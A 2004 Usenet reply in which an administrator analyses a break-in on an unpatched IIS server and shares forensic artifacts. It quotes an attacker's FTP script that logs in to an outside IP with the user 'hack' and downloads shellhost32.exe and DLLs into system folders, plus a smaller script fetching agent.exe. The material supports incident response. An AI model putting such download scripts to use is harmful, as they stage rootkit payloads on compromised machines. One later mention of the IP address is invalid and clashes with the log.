Re: Russian IIS hack? Malicious Javascript code

From: LPD (mcnutt_at_lcti.net)
Date: 06/25/04 

Date: 25 Jun 2004 08:13:55 -0700

The MS04-011 patch WAS NOT INSTALLED at the time of the intrusion. I
had indeed pushed it down with SUS but the install had failed to due
to the relatively large amount of disk space the patch requires to
install.

Found the files you mentioned on my box. Also found another file with
a timestamp that was a minute later than agent.exe and ftpcmd.txt.
File is a vbscript file called ads.vbs. I think that's the code they
used to modify IIS. I'd post the code but it's 32k in size - a little
much for a usenet posting.

Found something else: Hidden folder in the root of the OS parition
called X. dated 5/17/2004. inside there is a log file - x.txt. this
is what it contains:

open 219.195.24.60 33333
USER hack
hack
GET shellhost32.exe c:\winnt\system32\inetsrv\data\shellhost32.exe
GET shelllib.dll c:\winnt\system32\inetsrv\data\shelllib.dll
GET filter.ini c:\winnt\system32\inetsrv\data\filter.ini
GET filter.dll c:\winnt\system32\inetsrv\data\filter.dll
GET JAsfv.dll c:\winnt\system32\inetsrv\data\JAsfv.dll
GET JAsfv.ini c:\winnt\system32\inetsrv\data\JAsfv.ini
bye

291.195.24.60 is a japanese web server run by softbank. probably a
staging point.

I checked to see if the files in the txt file were there. found the
data folder and a temp folder inside that, and a zero byte empty file
- shellhost32.exe. either a failed attempt to upload a rootkit or a
test run I'm thinking.
  

"Ron Guyor" <rong@youngsinc.com> wrote in message news:<O01$lggWEHA.2544@TK2MSFTNGP10.phx.gbl>...
> I just found some files from the 23rd in my system32 directory. They are
> ftpcmd.txt and agent.exe. The ftpcmd.txt file has this:
> ---
> binary
> get agent.exe
> bye
> ---
>
> That could be where it's coming from.
>
> Ron
>
>

Relevant Pages

  • Re: Finally upgrading to Clipper 5.3 from S87
    ... patch and trying to install it. ... > timestamps in the folders, as all files in each folder were not patched ... > indicates the limit of memory Exospace can allocate, ...
    (comp.lang.clipper)
  • Re: Office 2003 Updates error - ouerror.gif (0/1)
    ... it would not let me install ... attempting to install any of the individual, downloaded patch EXE?s? ... No valid sequence could be found for the set of patches. ... Office Professional Edition 2003 Version 11.0.6361.0: ...
    (microsoft.public.officeupdate)
  • Errors applying kernel patch 118833-36
    ... install of Solaris 10 11/06. ... However, once the package list is done, I see a worrisome message: ... Below is the complete console output of the patch run. ... Changes for package SUNWnfsskr will not be applied to the system. ...
    (SunManagers)
  • problem installing patches ufter upgrade of Solaris 10u2
    ... download directory. ... Failed to install patch 119081-23. ... Reason code:0 ...
    (SunManagers)
  • OpenOffice? OMG!! Has ANYONE actually managed to install it?
    ... How do I send a patch ... The 'hedabu' action is particularly interesting, inasmuch that it cosmetically re-formats the header to shrink it on install. ... Getting an OO.o CVS account ... Using patch / diff ...
    (alt.os.linux)